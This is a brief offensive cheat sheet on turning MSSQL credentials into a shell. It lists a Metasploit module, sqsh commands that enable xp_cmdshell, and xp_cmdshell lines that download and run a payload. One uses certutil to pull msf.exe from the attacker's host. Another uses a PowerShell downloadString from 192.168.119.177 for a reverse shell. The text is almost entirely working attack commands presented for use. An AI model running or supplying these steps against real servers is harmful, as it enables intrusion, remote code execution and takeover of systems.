Once we have credentials to the MSSQL Server we are able to get a shell on the machine through either metasploit or sqsh.
Metasploit:
use windows/mssql/mssql_payload
set User
set PASSWORD
SQSH:
sqsh -S victim-ip -U sa -P password
exec sp_configure 'xp_cmdshell', 1
go
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell whoami
go
output
weoweo\wewo
you could also alternatively use either powershell toget a reverse shell or our own.
xp_cmdshell "certutil -urlcache -f http://myip:myport/msf.exe msf.exe" "
go
then
xp_cmdshell 'cmd /c msf.exe'
go
or
xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://192.168.119.177/Invoke-PowerShellTcp.ps1')"
go
creds to my friend adam :)
